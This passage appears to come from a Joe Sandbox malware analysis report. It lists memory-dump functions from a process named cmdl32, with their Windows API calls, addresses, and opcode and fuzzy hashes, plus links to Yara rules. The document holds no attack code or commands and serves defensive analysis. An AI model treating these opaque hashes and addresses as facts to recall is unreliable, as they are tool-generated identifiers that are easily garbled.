                                                                                        • Opcode ID: 8317c6b5c94f1b0c4c2d41ffd3729504dc0834940796569ef2c69def492451ec
                                                                                        • Instruction ID: 020eb2f61f916ddea2e8529e36b12b3656457cd3d2ba110d4f10d6446310720b
                                                                                        • Opcode Fuzzy Hash: 8317c6b5c94f1b0c4c2d41ffd3729504dc0834940796569ef2c69def492451ec
                                                                                        • Instruction Fuzzy Hash: 11F0653338021476E63175A99C46FDBB68C9B84BB1F150425F70CDB1C1D991B4054AE4
                                                                                        Function 027141F9 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027141D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 9dd5790946f4cc0dfb005e248ed0542b3028361f8d8d052740d6f813deef9118
                                                                                        • Instruction ID: 1dafb6fe7fd5cb73d1f5c709c7c31d2d080a468a59ddd66dc8b2503392c68848
                                                                                        • Opcode Fuzzy Hash: 9dd5790946f4cc0dfb005e248ed0542b3028361f8d8d052740d6f813deef9118
                                                                                        • Instruction Fuzzy Hash: DBF0E9BAE0010EBBDF00DEB8DC51FDE77A4DF55744F144195D81896141E631EA5ACB80
                                                                                        Function 02729150 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02711649,?,02725A1F,02711649,0272511F,02725A1F,?,02711649,0272511F,00001000,?,?,00000000), ref: 0272918F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 61d4f8c076ad4c1a884c16ea6189318a6020c21840bc9b2a53b4630d53a2b431
                                                                                        • Instruction ID: e1821961eaf78ccda00bf07e0c7be32db1fe726203c89151dd810aa936338566
                                                                                        • Opcode Fuzzy Hash: 61d4f8c076ad4c1a884c16ea6189318a6020c21840bc9b2a53b4630d53a2b431
                                                                                        • Instruction Fuzzy Hash: 84E06DB1200204BBD614EE58DC44FAB33ADEFC8710F404018FA08A7241DA30B810CBB8
                                                                                        Function 02710A0B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 02710A17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                        • Instruction ID: a9bbcd77436a6b862c1d7202b35466ab07e1ec6292965eee6fd72b65c83444c8
                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                        • Instruction Fuzzy Hash: FDD0C76774111C7AA61155956CC1DFEB75CDB856A5F004067FF08E5140E661590606B1
                                                                                        Function 04902C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: abe9023eec5bddeb96f89fff020cee020b0d14f3c9bb1b6d092476a7ad8355e0
                                                                                        • Instruction ID: ca5d2e87f3febd843912c9367bf81f50dbadbba5ca06e413d779b386d6b592c9
                                                                                        • Opcode Fuzzy Hash: abe9023eec5bddeb96f89fff020cee020b0d14f3c9bb1b6d092476a7ad8355e0
                                                                                        • Instruction Fuzzy Hash: 64B09B719415D5CAFB11F760460C71779486BD1705F15C0B6D2130686E4738D5D1F175